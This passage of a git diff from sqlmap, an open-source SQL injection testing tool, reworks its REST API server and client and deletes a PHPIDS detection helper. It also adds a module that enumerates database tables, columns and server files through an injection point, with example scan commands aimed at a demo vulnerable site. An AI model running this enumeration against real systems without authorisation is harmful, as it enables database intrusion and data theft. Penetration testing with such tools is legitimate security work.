'%s'" % option}) + + logger.debug("(%s) Retrieved values for option(s) '%s'" % (taskid, ','.join(options))) + + return jsonize({"success": True, "options": results}) @post("/option/<taskid>/set") def option_set(taskid): """ - Set an option (command line switch) for a certain task ID + Set value of option(s) for a certain task ID """ - global tasks - if taskid not in tasks: - abort(500, "Invalid task ID") + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to option_set()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) + + if request.json is None: + logger.warning("[%s] Invalid JSON options provided to option_set()" % taskid) + return jsonize({"success": False, "message": "Invalid JSON options"}) for option, value in request.json.items(): - tasks[taskid].set_option(option, value) + DataStore.tasks[taskid].set_option(option, value) + logger.debug("(%s) Requested to set options" % taskid) return jsonize({"success": True}) -# Function to handle scans +# Handle scans @post("/scan/<taskid>/start") def scan_start(taskid): """ Launch a scan """ - global tasks - if taskid not in tasks: - abort(500, "Invalid task ID") + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to scan_start()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) - # Initialize sqlmap engine's options with user's provided options, if any - for option, value in request.json.items(): - tasks[taskid].set_option(option, value) + if request.json is None: + logger.warning("[%s] Invalid JSON options provided to scan_start()" % taskid) + return jsonize({"success": False, "message": "Invalid JSON options"}) - # Overwrite output directory value to a temporary directory - tasks[taskid].set_output_directory() + for key in request.json: + if key in RESTAPI_UNSUPPORTED_OPTIONS: + logger.warning("[%s] Unsupported option '%s' provided to scan_start()" % (taskid, key)) + return jsonize({"success": False, "message": "Unsupported option '%s'" % key}) - # Launch sqlmap engine in a separate thread - logger.debug("starting a scan for task ID %s" % taskid) + # Initialize sqlmap engine's options with user's provided options, if any + for option, value in request.json.items(): + DataStore.tasks[taskid].set_option(option, value) - # Launch sqlmap engine - tasks[taskid].engine_start() + # Launch sqlmap engine in a separate process + DataStore.tasks[taskid].engine_start() - return jsonize({"success": True}) + logger.debug("(%s) Started scan" % taskid) + return jsonize({"success": True, "engineid": DataStore.tasks[taskid].engine_get_id()}) @get("/scan/<taskid>/stop") def scan_stop(taskid): """ Stop a scan """ - global tasks - if taskid not in tasks: - abort(500, "Invalid task ID") + if (taskid not in DataStore.tasks or DataStore.tasks[taskid].engine_process() is None or DataStore.tasks[taskid].engine_has_terminated()): + logger.warning("[%s] Invalid task ID provided to scan_stop()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) - return jsonize({"success": tasks[taskid].engine_stop()}) + DataStore.tasks[taskid].engine_stop() + + logger.debug("(%s) Stopped scan" % taskid) + return jsonize({"success": True}) @get("/scan/<taskid>/kill") def scan_kill(taskid): """ Kill a scan """ - global tasks - if taskid not in tasks: - abort(500, "Invalid task ID") + if (taskid not in DataStore.tasks or DataStore.tasks[taskid].engine_process() is None or DataStore.tasks[taskid].engine_has_terminated()): + logger.warning("[%s] Invalid task ID provided to scan_kill()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) - return jsonize({"success": tasks[taskid].engine_kill()}) + DataStore.tasks[taskid].engine_kill() -@get("/scan/<taskid>/delete") -def scan_delete(taskid): + logger.debug("(%s) Killed scan" % taskid) + return jsonize({"success": True}) + +@get("/scan/<taskid>/status") +def scan_status(taskid): """ - Delete a scan and corresponding temporary output directory and IPC database + Returns status of a scan """ - global tasks - if taskid not in tasks: - abort(500, "Invalid task ID") + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to scan_status()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) - scan_stop(taskid) - tasks[taskid].clean_filesystem() + if DataStore.tasks[taskid].engine_process() is None: + status = "not running" + else: + status = "terminated" if DataStore.tasks[taskid].engine_has_terminated() is True else "running" - return jsonize({"success": True}) + logger.debug("(%s) Retrieved scan status" % taskid) + return jsonize({ + "success": True, + "status": status, + "returncode": DataStore.tasks[taskid].engine_get_returncode() + }) @get("/scan/<taskid>/data") def scan_data(taskid): """ Retrieve the data of a scan """ - global db - global tasks + json_data_message = list() json_errors_message = list() - if taskid not in tasks: - abort(500, "Invalid task ID") + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to scan_data()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) # Read all data from the IPC database for the taskid - for status, content_type, value in db.execute("SELECT status, content_type, value FROM data WHERE taskid = ? ORDER BY id ASC", (taskid,)): - json_data_message.append([status, content_type, dejsonize(value)]) + for status, content_type, value in DataStore.current_db.execute("SELECT status, content_type, value FROM data WHERE taskid = ? ORDER BY id ASC", (taskid,)): + json_data_message.append({"status": status, "type": content_type, "value": dejsonize(value)}) # Read all error messages from the IPC database - for error in db.execute("SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC", (taskid,)): + for error in DataStore.current_db.execute("SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC", (taskid,)): json_errors_message.append(error) - return jsonize({"data": json_data_message, "error": json_errors_message}) + logger.debug("(%s) Retrieved scan data and error messages" % taskid) + return jsonize({"success": True, "data": json_data_message, "error": json_errors_message}) # Functions to handle scans' logs @get("/scan/<taskid>/log/<start>/<end>") @@ -450,42 +606,45 @@ def scan_log_limited(taskid, start, end): """ Retrieve a subset of log messages """ - global db - global tasks + json_log_messages = list() - if taskid not in tasks: - abort(500, "Invalid task ID") + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to scan_log_limited()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) - if not start.isdigit() or not end.isdigit() or end < start: - abort(500, "Invalid start or end value, must be digits") + if not start.isdigit() or not end.isdigit() or int(end) < int(start): + logger.warning("[%s] Invalid start or end value provided to scan_log_limited()" % taskid) + return jsonize({"success": False, "message": "Invalid start or end value, must be digits"}) start = max(1, int(start)) end = max(1, int(end)) # Read a subset of log messages from the IPC database - for time_, level, message in db.execute("SELECT time, level, message FROM logs WHERE taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC", (taskid, start, end)): + for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC", (taskid, start, end)): json_log_messages.append({"time": time_, "level": level, "message": message}) - return jsonize({"log": json_log_messages}) + logger.debug("(%s) Retrieved scan log messages subset" % taskid) + return jsonize({"success": True, "log": json_log_messages}) @get("/scan/<taskid>/log") def scan_log(taskid): """ Retrieve the log messages """ - global db - global tasks + json_log_messages = list() - if taskid not in tasks: - abort(500, "Invalid task ID") + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to scan_log()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) # Read all log messages from the IPC database - for time_, level, message in db.execute("SELECT time, level, message FROM logs WHERE taskid = ? ORDER BY id ASC", (taskid,)): + for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? ORDER BY id ASC", (taskid,)): json_log_messages.append({"time": time_, "level": level, "message": message}) - return jsonize({"log": json_log_messages}) + logger.debug("(%s) Retrieved scan log messages" % taskid) + return jsonize({"success": True, "log": json_log_messages}) # Function to handle files inside the output directory @get("/download/<taskid>/<target>/<filename:path>") @@ -493,47 +652,267 @@ def download(taskid, target, filename): """ Download a certain file from the file system """ - if taskid not in tasks: - abort(500, "Invalid task ID") - # Prevent file path traversal - the lame way - if target.startswith("."): - abort(500) + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to download()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) - path = os.path.join(paths.SQLMAP_OUTPUT_PATH, target) + path = os.path.abspath(os.path.join(paths.SQLMAP_OUTPUT_PATH, target, filename)) + # Prevent file path traversal + if not path.startswith(paths.SQLMAP_OUTPUT_PATH): + logger.warning("[%s] Forbidden path (%s)" % (taskid, target)) + return jsonize({"success": False, "message": "Forbidden path"}) - if os.path.exists(path): - return static_file(filename, root=path) + if os.path.isfile(path): + logger.debug("(%s) Retrieved content of file %s" % (taskid, target)) + content = openFile(path, "rb").read() + return jsonize({"success": True, "file": encodeBase64(content, binary=False)}) else: - abort(500) + logger.warning("[%s] File does not exist %s" % (taskid, target)) + return jsonize({"success": False, "message": "File does not exist"}) + +@get("/version") +def version(token=None): + """ + Fetch server version + """ -def server(host="0.0.0.0", port=RESTAPI_SERVER_PORT): + logger.debug("Fetched version (%s)" % ("admin" if is_admin(token) else request.remote_addr)) + return jsonize({"success": True, "version": VERSION_STRING.split('/')[-1]}) + +def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=RESTAPI_DEFAULT_ADAPTER, username=None, password=None, database=None): """ REST-JSON API server """ - global adminid - global db - adminid = hexencode(os.urandom(16)) - db = Database() - db.initialize() + DataStore.admin_token = encodeHex(os.urandom(16), binary=False) + DataStore.username = username + DataStore.password = password + + if not database: + _, Database.filepath = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.IPC, text=False) + os.close(_) + else: + Database.filepath = database + + if port == 0: # random + with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s: + s.bind((host, 0)) + port = s.getsockname()[1] + + logger.info("Running REST-JSON API server at '%s:%d'.." % (host, port)) + logger.info("Admin (secret) token: %s" % DataStore.admin_token) + logger.debug("IPC database: '%s'" % Database.filepath) - logger.info("running REST-JSON API server at '%s:%d'.." % (host, port)) - logger.info("the admin task ID is: %s" % adminid) + # Initialize IPC database + DataStore.current_db = Database() + DataStore.current_db.connect() + DataStore.current_db.init() # Run RESTful API - run(host=host, port=port, quiet=False, debug=False) + try: + # Supported adapters: aiohttp, auto, bjoern, cgi, cherrypy, diesel, eventlet, fapws3, flup, gae, gevent, geventSocketIO, gunicorn, meinheld, paste, rocket, tornado, twisted, waitress, wsgiref + # Reference: https://bottlepy.org/docs/dev/deployment.html || bottle.server_names + + if adapter == "gevent": + from gevent import monkey + monkey.patch_all() + elif adapter == "eventlet": + import eventlet + eventlet.monkey_patch() + logger.debug("Using adapter '%s' to run bottle" % adapter) + run(host=host, port=port, quiet=True, debug=True, server=adapter) + except socket.error as ex: + if "already in use" in getSafeExString(ex): + logger.error("Address already in use ('%s:%s')" % (host, port)) + else: + raise + except ImportError: + if adapter.lower() not in server_names: + errMsg = "Adapter '%s' is unknown. " % adapter + errMsg += "List of supported adapters: %s" % ', '.join(sorted(list(server_names.keys()))) + else: + errMsg = "Server support for adapter '%s' is not installed on this system " % adapter + errMsg += "(Note: you can try to install it with 'apt install python-%s' or 'pip%s install %s')" % (adapter, '3' if six.PY3 else "", adapter) + logger.critical(errMsg) + +def _client(url, options=None): + logger.debug("Calling '%s'" % url) + try: + headers = {"Content-Type": "application/json"} + + if options is not None: + data = getBytes(jsonize(options)) + else: + data = None -def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): + if DataStore.username or DataStore.password: + headers["Authorization"] = "Basic %s" % encodeBase64("%s:%s" % (DataStore.username or "", DataStore.password or ""), binary=False) + + req = _urllib.request.Request(url, data, headers) + response = _urllib.request.urlopen(req) + text = getText(response.read()) + except: + if options: + logger.error("Failed to load and parse %s" % url) + raise + return text + +def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, username=None, password=None): """ REST-JSON API client """ + + DataStore.username = username + DataStore.password = password + + dbgMsg = "Example client access from command line:" + dbgMsg += "\n\t$ taskid=$(curl http://%s:%d/task/new 2>1 | grep -o -I '[a-f0-9]\\{16\\}') && echo $taskid" % (host, port) + dbgMsg += "\n\t$ curl -H \"Content-Type: application/json\" -X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' http://%s:%d/scan/$taskid/start" % (host, port) + dbgMsg += "\n\t$ curl http://%s:%d/scan/$taskid/data" % (host, port) + dbgMsg += "\n\t$ curl http://%s:%d/scan/$taskid/log" % (host, port) + logger.debug(dbgMsg) + addr = "http://%s:%d" % (host, port) - logger.info("starting debug REST-JSON client to '%s'..." % addr) - - # TODO: write a simple client with requests, for now use curl from command line - logger.error("not yet implemented, use curl from command line instead for now, for example:") - print "\n\t$ curl http://%s:%d/task/new" % (host, port) - print "\t$ curl -H \"Content-Type: application/json\" -X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' http://%s:%d/scan/:taskid/start" % (host, port) - print "\t$ curl http://%s:%d/scan/:taskid/output" % (host, port) - print "\t$ curl http://%s:%d/scan/:taskid/log\n" % (host, port) + logger.info("Starting REST-JSON API client to '%s'..." % addr) + + try: + _client(addr) + except Exception as ex: + if not isinstance(ex, _urllib.error.HTTPError) or ex.code == _http_client.UNAUTHORIZED: + errMsg = "There has been a problem while connecting to the " + errMsg += "REST-JSON API server at '%s' " % addr + errMsg += "(%s)" % getSafeExString(ex) + logger.critical(errMsg) + return + + commands = ("help", "new", "use", "data", "log", "status", "option", "stop", "kill", "list", "flush", "version", "exit", "bye", "quit") + colors = ('red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'lightgrey', 'lightred', 'lightgreen', 'lightyellow', 'lightblue', 'lightmagenta', 'lightcyan') + autoCompletion(AUTOCOMPLETE_TYPE.API, commands=commands) + + taskid = None + logger.info("Type 'help' or '?' for list of available commands") + + while True: + try: + color = colors[int(taskid or "0", 16) % len(colors)] + command = _input("api%s> " % (" (%s)" % setColor(taskid, color) if taskid else "")).strip() + command = re.sub(r"\A(\w+)", lambda match: match.group(1).lower(), command) + except (EOFError, KeyboardInterrupt): + print() + break + + if command in ("data", "log", "status", "stop", "kill"): + if not taskid: + logger.error("No task ID in use") + continue + raw = _client("%s/scan/%s/%s" % (addr, taskid, command)) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to execute command %s" % command) + dataToStdout("%s\n" % raw) + + elif command.startswith("option"): + if not taskid: + logger.error("No task ID in use") + continue + try: + command, option = command.split(" ", 1) + except ValueError: + raw = _client("%s/option/%s/list" % (addr, taskid)) + else: + options = re.split(r"\s*,\s*", option.strip()) + raw = _client("%s/option/%s/get" % (addr, taskid), options) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to execute command %s" % command) + dataToStdout("%s\n" % raw) + + elif command.startswith("new"): + if ' ' not in command: + logger.error("Program arguments are missing") + continue + + try: + argv = ["sqlmap.py"] + shlex.split(command)[1:] + except Exception as ex: + logger.error("Error occurred while parsing arguments ('%s')" % getSafeExString(ex)) + taskid = None + continue + + try: + cmdLineOptions = cmdLineParser(argv).__dict__ + except: + taskid = None + continue + + for key in list(cmdLineOptions): + if cmdLineOptions[key] is None: + del cmdLineOptions[key] + + raw = _client("%s/task/new" % addr) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to create new task ('%s')" % res.get("message", "")) + continue + taskid = res["taskid"] + logger.info("New task ID is '%s'" % taskid) + + raw = _client("%s/scan/%s/start" % (addr, taskid), cmdLineOptions) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to start scan ('%s')" % res.get("message", "")) + continue + logger.info("Scanning started") + + elif command.startswith("use"): + taskid = (command.split()[1] if ' ' in command else "").strip("'\"") + if not taskid: + logger.error("Task ID is missing") + taskid = None + continue + elif not re.search(r"\A[0-9a-fA-F]{16}\Z", taskid): + logger.error("Invalid task ID '%s'" % taskid) + taskid = None + continue + logger.info("Switching to task ID '%s' " % taskid) + + elif command in ("version",): + raw = _client("%s/%s" % (addr, command)) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to execute command %s" % command) + dataToStdout("%s\n" % raw) + + elif command in ("list", "flush"): + raw = _client("%s/admin/%s" % (addr, command)) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to execute command %s" % command) + elif command == "flush": + taskid = None + dataToStdout("%s\n" % raw) + + elif command in ("exit", "bye", "quit", 'q'): + return + + elif command in ("help", "?"): + msg = "help Show this help message\n" + msg += "new ARGS Start a new scan task with provided arguments (e.g. 'new -u \"http://testphp.vulnweb.com/artists.php?artist=1\"')\n" + msg += "use TASKID Switch current context to different task (e.g. 'use c04d8c5c7582efb4')\n" + msg += "data Retrieve and show data for current task\n" + msg += "log Retrieve and show log for current task\n" + msg += "status Retrieve and show status for current task\n" + msg += "option OPTION Retrieve and show option for current task\n" + msg += "options Retrieve and show all options for current task\n" + msg += "stop Stop current task\n" + msg += "kill Kill current task\n" + msg += "list Display all tasks\n" + msg += "version Fetch server version\n" + msg += "flush Flush tasks (delete all tasks)\n" + msg += "exit Exit this client\n" + + dataToStdout(msg) + + elif command: + logger.error("Unknown command '%s'" % command) diff --git a/lib/utils/brute.py b/lib/utils/brute.py new file mode 100644 index 00000000000..7833a3982ce --- /dev/null +++ b/lib/utils/brute.py @@ -0,0 +1,408 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from __future__ import division + +import time + +from lib.core.common import Backend +from lib.core.common import clearConsoleLine +from lib.core.common import dataToStdout +from lib.core.common import filterListValue +from lib.core.common import getFileItems +from lib.core.common import getPageWordSet +from lib.core.common import hashDBWrite +from lib.core.common import isNoneValue +from lib.core.common import ntToPosixSlashes +from lib.core.common import popValue +from lib.core.common import pushValue +from lib.core.common import randomInt +from lib.core.common import randomStr +from lib.core.common import readInput +from lib.core.common import safeSQLIdentificatorNaming +from lib.core.common import safeStringFormat +from lib.core.common import unArrayizeValue +from lib.core.common import unsafeSQLIdentificatorNaming +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.decorators import stackedmethod +from lib.core.enums import DBMS +from lib.core.enums import HASHDB_KEYS +from lib.core.enums import PAYLOAD +from lib.core.exception import SqlmapDataException +from lib.core.exception import SqlmapMissingMandatoryOptionException +from lib.core.exception import SqlmapNoneDataException +from lib.core.settings import BRUTE_COLUMN_EXISTS_TEMPLATE +from lib.core.settings import BRUTE_TABLE_EXISTS_TEMPLATE +from lib.core.settings import METADB_SUFFIX +from lib.core.settings import UPPER_CASE_DBMSES +from lib.core.threads import getCurrentThreadData +from lib.core.threads import runThreads +from lib.request import inject + +def _addPageTextWords(): + wordsList = [] + + infoMsg = "adding words used on web page to the check list" + logger.info(infoMsg) + pageWords = getPageWordSet(kb.originalPage) + + for word in pageWords: + word = word.lower() + + if len(word) > 2 and not word[0].isdigit() and word not in wordsList: + wordsList.append(word) + + return wordsList + +@stackedmethod +def tableExists(tableFile, regex=None): + if kb.choices.tableExists is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct: + warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED]) + warnMsg += "for common table existence check" + logger.warning(warnMsg) + + message = "are you sure you want to continue? [y/N] " + kb.choices.tableExists = readInput(message, default='N', boolean=True) + + if not kb.choices.tableExists: + return None + + result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), randomStr()))) + + if result: + errMsg = "can't use table existence check because of detected invalid results " + errMsg += "(most likely caused by inability of the used injection " + errMsg += "to distinguish erroneous results)" + raise SqlmapDataException(errMsg) + + pushValue(conf.db) + + if conf.db and Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: + conf.db = conf.db.upper() + + message = "which common tables (wordlist) file do you want to use?\n" + message += "[1] default '%s' (press Enter)\n" % tableFile + message += "[2] custom" + choice = readInput(message, default='1') + + if choice == '2': + message = "what's the custom common tables file location?\n" + tableFile = readInput(message) or tableFile + + infoMsg = "performing table existence using items from '%s'" % tableFile + logger.info(infoMsg) + + tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True) + tables.extend(_addPageTextWords()) + tables = filterListValue(tables, regex) + + for conf.db in (conf.db.split(',') if conf.db else [conf.db]): + if conf.db and METADB_SUFFIX not in conf.db: + infoMsg = "checking database '%s'" % conf.db + logger.info(infoMsg) + + threadData = getCurrentThreadData() + threadData.shared.count = 0 + threadData.shared.limit = len(tables) + threadData.shared.files = [] + threadData.shared.unique = set() + + def tableExistsThread(): + threadData = getCurrentThreadData() + + while kb.threadContinue: + kb.locks.count.acquire() + if threadData.shared.count < threadData.shared.limit: + table = safeSQLIdentificatorNaming(tables[threadData.shared.count], True) + threadData.shared.count += 1 + kb.locks.count.release() + else: + kb.locks.count.release() + break + + if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): + fullTableName = "%s.%s" % (conf.db, table) + else: + fullTableName = table + + if Backend.isDbms(DBMS.MCKOI): + _ = randomInt(1) + result = inject.checkBooleanExpression("%s" % safeStringFormat("%d=(SELECT %d FROM %s)", (_, _, fullTableName))) + else: + result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), fullTableName))) + + kb.locks.io.acquire() + + if result and table.lower() not in threadData.shared.unique: + threadData.shared.files.append(table) + threadData.shared.unique.add(table.lower()) + + if conf.verbose in (1, 2) and not conf.api: + clearConsoleLine(True) + infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table)) + dataToStdout(infoMsg, True) + + if conf.verbose in (1, 2): + status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) + dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) + + kb.locks.io.release() + + try: + runThreads(conf.threads, tableExistsThread, threadChoice=True) + except KeyboardInterrupt: + warnMsg = "user aborted during table existence " + warnMsg += "check. sqlmap will display partial output" + logger.warning(warnMsg) + + clearConsoleLine(True) + dataToStdout("\n") + + if not threadData.shared.files: + warnMsg = "no table(s) found" + if conf.db: + warnMsg += " for database '%s'" % conf.db + logger.warning(warnMsg) + else: + for item in threadData.shared.files: + if conf.db not in kb.data.cachedTables: + kb.data.cachedTables[conf.db] = [item] + else: + kb.data.cachedTables[conf.db].append(item) + + for _ in ((conf.db, item) for item in threadData.shared.files): + if _ not in kb.brute.tables: + kb.brute.tables.append(_) + + conf.db = popValue() + hashDBWrite(HASHDB_KEYS.KB_BRUTE_TABLES, kb.brute.tables, True) + + return kb.data.cachedTables + +def columnExists(columnFile, regex=None): + if kb.choices.columnExists is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct: + warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED]) + warnMsg += "for common column existence check" + logger.warning(warnMsg) + + message = "are you sure you want to continue? [y/N] " + kb.choices.columnExists = readInput(message, default='N', boolean=True) + + if not kb.choices.columnExists: + return None + + if not conf.tbl: + errMsg = "missing table parameter" + raise SqlmapMissingMandatoryOptionException(errMsg) + + if conf.db and Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: + conf.db = conf.db.upper() + + result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (randomStr(), randomStr()))) + + if result: + errMsg = "can't use column existence check because of detected invalid results " + errMsg += "(most likely caused by inability of the used injection " + errMsg += "to distinguish erroneous results)" + raise SqlmapDataException(errMsg) + + message = "which common columns (wordlist) file do you want to use?\n" + message += "[1] default '%s' (press Enter)\n" % columnFile + message += "[2] custom" + choice = readInput(message, default='1') + + if choice == '2': + message = "what's the custom common columns file location?\n" + columnFile = readInput(message) or columnFile + + infoMsg = "checking column existence using items from '%s'" % columnFile + logger.info(infoMsg) + + columns = getFileItems(columnFile, unique=True) + columns.extend(_addPageTextWords()) + columns = filterListValue(columns, regex) + + for table in conf.tbl.split(','): + table = safeSQLIdentificatorNaming(table, True) + + if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): + table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table) + + kb.threadContinue = True + kb.bruteMode = True + + threadData = getCurrentThreadData() + threadData.shared.count = 0 + threadData.shared.limit = len(columns) + threadData.shared.files = [] + + def columnExistsThread(): + threadData = getCurrentThreadData() + + while kb.threadContinue: + kb.locks.count.acquire() + + if threadData.shared.count < threadData.shared.limit: + column = safeSQLIdentificatorNaming(columns[threadData.shared.count]) + threadData.shared.count += 1 + kb.locks.count.release() + else: + kb.locks.count.release() + break + + if Backend.isDbms(DBMS.MCKOI): + result = inject.checkBooleanExpression(safeStringFormat("0<(SELECT COUNT(%s) FROM %s)", (column, table))) + else: + result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table))) + + kb.locks.io.acquire() + + if result: + threadData.shared.files.append(column) + + if conf.verbose in (1, 2) and not conf.api: + clearConsoleLine(True) + infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column)) + dataToStdout(infoMsg, True) + + if conf.verbose in (1, 2): + status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) + dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) + + kb.locks.io.release() + + try: + runThreads(conf.threads, columnExistsThread, threadChoice=True) + except KeyboardInterrupt: + warnMsg = "user aborted during column existence " + warnMsg += "check. sqlmap will display partial output" + logger.warning(warnMsg) + finally: + kb.bruteMode = False + + clearConsoleLine(True) + dataToStdout("\n") + + if not threadData.shared.files: + warnMsg = "no column(s) found" + logger.warning(warnMsg) + else: + columns = {} + + for column in threadData.shared.files: + if Backend.getIdentifiedDbms() in (DBMS.MYSQL,): + result = not inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s REGEXP '[^0-9]')", (column, table, column))) + elif Backend.getIdentifiedDbms() in (DBMS.SQLITE,): + result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s NOT GLOB '*[^0-9]*')", (column, table, column))) + elif Backend.getIdentifiedDbms() in (DBMS.MCKOI,): + result = inject.checkBooleanExpression("%s" % safeStringFormat("0=(SELECT MAX(%s)-MAX(%s) FROM %s)", (column, column, table))) + else: + result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column))) + + if result: + columns[column] = "numeric" + else: + columns[column] = "non-numeric" + + kb.data.cachedColumns[conf.db] = {table: columns} + + for _ in ((conf.db, table, item[0], item[1]) for item in columns.items()): + if _ not in kb.brute.columns: + kb.brute.columns.append(_) + + hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True) + + return kb.data.cachedColumns + +@stackedmethod +def fileExists(pathFile): + retVal = [] + + message = "which common files file do you want to use?\n" + message += "[1] default '%s' (press Enter)\n" % pathFile + message += "[2] custom" + choice = readInput(message, default='1') + + if choice == '2': + message = "what's the custom common files file location?\n" + pathFile = readInput(message) or pathFile + + infoMsg = "checking files existence using items from '%s'" % pathFile + logger.info(infoMsg) + + paths = getFileItems(pathFile, unique=True) + + kb.bruteMode = True + + try: + conf.dbmsHandler.readFile(randomStr()) + except SqlmapNoneDataException: + pass + except: + kb.bruteMode = False + raise + + threadData = getCurrentThreadData() + threadData.shared.count = 0 + threadData.shared.limit = len(paths) + threadData.shared.files = [] + + def fileExistsThread(): + threadData = getCurrentThreadData() + + while kb.threadContinue: + kb.locks.count.acquire() + if threadData.shared.count < threadData.shared.limit: + path = ntToPosixSlashes(paths[threadData.shared.count]) + threadData.shared.count += 1 + kb.locks.count.release() + else: + kb.locks.count.release() + break + + try: + result = unArrayizeValue(conf.dbmsHandler.readFile(path)) + except SqlmapNoneDataException: + result = None + + kb.locks.io.acquire() + + if not isNoneValue(result): + threadData.shared.files.append(result) + + if not conf.api: + clearConsoleLine(True) + infoMsg = "[%s] [INFO] retrieved: '%s'\n" % (time.strftime("%X"), path) + dataToStdout(infoMsg, True) + + if conf.verbose in (1, 2): + status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) + dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) + + kb.locks.io.release() + + try: + runThreads(conf.threads, fileExistsThread, threadChoice=True) + except KeyboardInterrupt: + warnMsg = "user aborted during file existence " + warnMsg += "check. sqlmap will display partial output" + logger.warning(warnMsg) + finally: + kb.bruteMode = False + + clearConsoleLine(True) + dataToStdout("\n") + + if not threadData.shared.files: + warnMsg = "no file(s) found" + logger.warning(warnMsg) + else: + retVal = threadData.shared.files + + return retVal diff --git a/lib/utils/checkpayload.py b/lib/utils/checkpayload.py deleted file mode 100644 index 84410f8a542..00000000000 --- a/lib/utils/checkpayload.py +++ /dev/null @@ -1,56 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.common import readXmlFile -from lib.core.common import urldecode -from lib.core.data import paths -from lib.core.data import logger - -rules = None - -def _adjustGrammar(string): - string = re.sub('\ADetects', 'Detected', string) - string = re.sub('\Afinds', 'Found', string) - string = re.sub('attempts\Z', 'attempt', string) - string = re.sub('injections\Z', 'injection', string) - string = re.sub('attacks\Z', 'attack', string) - - return string - -def checkPayload(payload): - """ - This method checks if the generated payload is detectable by the - PHPIDS filter rules - """ - - if not payload: - return - - 